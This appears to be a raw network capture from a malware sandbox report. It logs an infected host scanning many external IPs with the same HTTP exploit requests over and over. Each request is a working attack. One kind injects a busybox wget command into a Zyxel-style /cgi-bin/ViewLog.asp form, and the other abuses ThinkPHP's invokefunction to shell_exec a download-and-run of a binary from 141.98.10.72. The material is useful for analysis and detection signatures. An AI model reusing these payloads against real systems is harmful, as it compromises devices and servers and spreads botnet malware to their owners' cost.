                                                            Feb 14, 2024 09:29:56.147159100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.522358894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:12.272847891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.773838043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:16.775824070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            839192.168.2.234978894.122.8.928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.351984978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            840192.168.2.234194894.120.20.2058080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.352132082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            841192.168.2.235280295.100.66.9980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.800966024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.003439903 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 31 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 34 37 31 61 31 33 62 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a17a7b5c&#46;1707899391&#46;471a13bb</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            842192.168.2.234534695.228.168.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.813755989 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.029503107 CET450INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            843192.168.2.235408295.216.234.9480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.818651915 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.039002895 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            844192.168.2.235803695.216.243.18480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.822912931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.047509909 CET323INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            845192.168.2.235344895.67.88.480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.830248117 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.065721989 CET393INHTTP/1.1 505 HTTP Version not supported
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 140
                                                            X-Frame-Options: SAMEORIGIN
                                                            Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            846192.168.2.233980695.182.121.11980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.845516920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.091429949 CET514INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                            Server: Apache/2.4.57 (Debian)
                                                            Content-Length: 320
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 35 38 34 31 2e 6d 73 6b 2e 77 65 62 2e 68 69 67 68 73 65 72 76 65 72 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 125841.msk.web.highserver.ru Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            847192.168.2.234104295.218.216.21680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.879384995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.162098885 CET193INHTTP/1.1 301 Moved Permanently
                                                            Content-length: 0
                                                            Location: https:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            848192.168.2.233322095.101.50.480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:51.909181118 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.219754934 CET478INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 256
                                                            Expires: Wed, 14 Feb 2024 08:29:52 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:52 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 36 39 65 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 32 26 23 34 36 3b 31 33 35 37 33 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;f69e1002&#46;1707899392&#46;135731</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            849192.168.2.2346860112.170.27.14380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.189920902 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            850192.168.2.2353460112.133.19.3180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.218101025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            851192.168.2.2340710112.126.222.18280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.364895105 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.701694012 CET188INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:39 GMT
                                                            Server: Apache
                                                            Content-Length: 11
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            852192.168.2.2346366112.125.217.15880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.366517067 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:52.733640909 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:30:45 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            853192.168.2.2334424112.17.48.4980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.463932991 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            854192.168.2.233976295.85.132.1708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.774312973 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            855192.168.2.235831262.29.114.578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:52.789344072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            856192.168.2.235654895.179.192.21280
                                                            TimestampBytes transferredDirectionData
